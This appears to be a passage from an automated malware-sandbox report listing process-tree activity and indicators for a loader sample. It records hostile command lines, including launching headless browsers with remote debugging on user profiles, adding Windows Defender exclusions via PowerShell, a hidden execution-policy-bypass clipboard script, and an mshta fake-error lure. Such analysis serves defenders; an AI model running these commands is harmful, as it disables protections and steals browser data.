Token: SeShutdownPrivilege	7676	chrome.exe
Token: SeCreatePagefilePrivilege	7676	chrome.exe
Token: SeShutdownPrivilege	7676	chrome.exe
Token: SeCreatePagefilePrivilege	7676	chrome.exe
Token: SeShutdownPrivilege	7676	chrome.exe
Token: SeCreatePagefilePrivilege	7676	chrome.exe
Token: SeShutdownPrivilege	7676	chrome.exe
Token: SeCreatePagefilePrivilege	7676	chrome.exe
Token: SeShutdownPrivilege	7676	chrome.exe
Token: SeCreatePagefilePrivilege	7676	chrome.exe
Token: SeDebugPrivilege	11552	taskkill.exe
Token: SeDebugPrivilege	10344	taskkill.exe
Token: SeDebugPrivilege	9224	powershell.exe
Token: SeDebugPrivilege	12604	powershell.exe
Token: SeDebugPrivilege	8744	tasklist.exe
Token: SeDebugPrivilege	9176	BlueMail.exe
Token: SeDebugPrivilege	6668	Gxtuum.exe
Token: SeDebugPrivilege	11048	Gxtuum.exe
Token: SeDebugPrivilege	6668	Gxtuum.exe
Token: SeDebugPrivilege	11048	Gxtuum.exe
Token: SeDebugPrivilege	10604	Gxtuum.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
5108	chrome.exe
7676	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 468 wrote to memory of 4720	468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe	82
PID 468 wrote to memory of 4720	468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe	82
PID 468 wrote to memory of 4720	468	d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe	82
PID 4720 wrote to memory of 908	4720	skotes.exe	83
PID 4720 wrote to memory of 908	4720	skotes.exe	83
PID 908 wrote to memory of 3928	908	LoaderHRC.exe	84
PID 908 wrote to memory of 3928	908	LoaderHRC.exe	84
PID 3928 wrote to memory of 4244	3928	LoaderHRC.exe	86
PID 3928 wrote to memory of 4244	3928	LoaderHRC.exe	86
PID 4720 wrote to memory of 1496	4720	skotes.exe	90
PID 4720 wrote to memory of 1496	4720	skotes.exe	90
PID 4720 wrote to memory of 1496	4720	skotes.exe	90
PID 3928 wrote to memory of 5108	3928	LoaderHRC.exe	93
PID 3928 wrote to memory of 5108	3928	LoaderHRC.exe	93
PID 3928 wrote to memory of 112	3928	LoaderHRC.exe	94
PID 3928 wrote to memory of 112	3928	LoaderHRC.exe	94
PID 5108 wrote to memory of 4468	5108	chrome.exe	95
PID 5108 wrote to memory of 4468	5108	chrome.exe	95
PID 112 wrote to memory of 4432	112	msedge.exe	96
PID 112 wrote to memory of 4432	112	msedge.exe	96
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5196	112	msedge.exe	98
PID 112 wrote to memory of 5224	112	msedge.exe	99
PID 112 wrote to memory of 5224	112	msedge.exe	99
PID 5108 wrote to memory of 5340	5108	chrome.exe	100
PID 5108 wrote to memory of 5340	5108	chrome.exe	100

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3520
- C:\Users\Admin\AppData\Local\Temp\d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe
  "C:\Users\Admin\AppData\Local\Temp\d9865442479ec9a282ff312cd91481710f9b6e21330be30a68fa16bf36c0799f.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4720
  - - C:\Users\Admin\AppData\Local\Temp\1014759001\LoaderHRC.exe
      "C:\Users\Admin\AppData\Local\Temp\1014759001\LoaderHRC.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:908
    - - C:\Users\Admin\AppData\Local\Temp\1014759001\LoaderHRC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1014759001\LoaderHRC.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3928
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:4244
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8163 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:5108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffd3792cc40,0x7ffd3792cc4c,0x7ffd3792cc58
        7⤵
        
        PID:4468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2
        7⤵
        
        PID:5340
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2168,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2172 /prefetch:3
        7⤵
        
        PID:5384
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2256,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:8
        7⤵
        
        PID:5436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8163 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3756,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3812 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8163 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3760,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5748
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8163 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4708,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4704 /prefetch:8
        7⤵
        
        PID:10324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4872,i,8563355050226233545,679235132941716671,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8
        7⤵
        
        PID:6948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=8798 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        6⤵
        Uses browser remote debugging
        Suspicious use of WriteProcessMemory
        
        PID:112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd377e46f8,0x7ffd377e4708,0x7ffd377e4718
        7⤵
        
        PID:4432
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1504,979117294196309521,1001750774369000547,131072 --disable-features=PaintHolding --headless=new --headless --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1512 /prefetch:2
        7⤵
        
        PID:5196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1504,979117294196309521,1001750774369000547,131072 --disable-features=PaintHolding --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1844 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8798 --allow-pre-commit-input --field-trial-handle=1504,979117294196309521,1001750774369000547,131072 --disable-features=PaintHolding --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2020 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:5724
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        6⤵
        
        PID:9672
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:12536
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        6⤵
        
        PID:12612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:10180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command " Add-MpPreference -ExclusionExtension '.ps1', '.tmp', '.py' Add-MpPreference -ExclusionPath \"$env:TEMP\", \"$env:APPDATA\" "
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:8868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:2412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        6⤵
        
        PID:8532
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:8536
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Powershell\Get-Clipboard.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:4184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4owefkww\4owefkww.cmdline"
        7⤵
        
        PID:4944
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4BE9.tmp" "c:\Users\Admin\AppData\Local\Temp\4owefkww\CSC8B47C74AD4AF4A2D9D1FA03E81A51FB.TMP"
        8⤵
        
        PID:7336
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:6596
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:11044
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:212
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:6920
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:4072
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:5752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:1668
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:10468
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:11248
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:7092
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:10880
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:12976
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:13276
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:10312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:10360
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:5292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:1324
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:8576
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:8128
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:7404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:12152
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:4808
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:4220
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:7064
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:8220
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:6700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:5244
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:5168
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:5356
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:4588
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:6688
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:7220
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:1692
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:5872
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:11064
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:2760
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:9924
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:6204
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig"
        6⤵
        
        PID:8288
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig
        7⤵
        Gathers network information
        
        PID:4112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ipconfig /all"
        6⤵
        
        PID:8052
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        7⤵
        Gathers network information
        
        PID:2456
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:5888
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:6240
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Missing runtime 140.DLL please download runtime 140 to continue.', 0, 'Missing DLL files', 0+16);close()""
        6⤵
        
        PID:8416
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Missing runtime 140.DLL please download runtime 140 to continue.', 0, 'Missing DLL files', 0+16);close()"
        7⤵
        
        PID:10164
  - - C:\Users\Admin\AppData\Local\Temp\1014798001\4ZD5C3i.exe
      "C:\Users\Admin\AppData\Local\Temp\1014798001\4ZD5C3i.exe"
      4⤵
      Executes dropped EXE
      Enumerates connected drives
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\1014819001\Loader.exe
      "C:\Users\Admin\AppData\Local\Temp\1014819001\Loader.exe"
      4⤵
      Executes dropped EXE
      PID:7432
    - - C:\Users\Admin\AppData\Local\Temp\1014819001\Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1014819001\Loader.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops desktop.ini file(s)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:10120
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:7640
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8502 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        6⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:7676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd2f7dcc40,0x7ffd2f7dcc4c,0x7ffd2f7dcc58
        7⤵
        
        PID:6212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1952,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=1948 /prefetch:2
        7⤵
        
        PID:5800
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2208,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=2256 /prefetch:3
        7⤵
        
        PID:11032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=2296,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=2168 /prefetch:8
        7⤵
        
        PID:8812
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8502 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,1026624269553509687,17841815792166819456,262144 --disable-features=PaintHolding --variations-seed-version=20241212-180655.825000 --mojo-platform-channel-handle=3116 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:12520
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
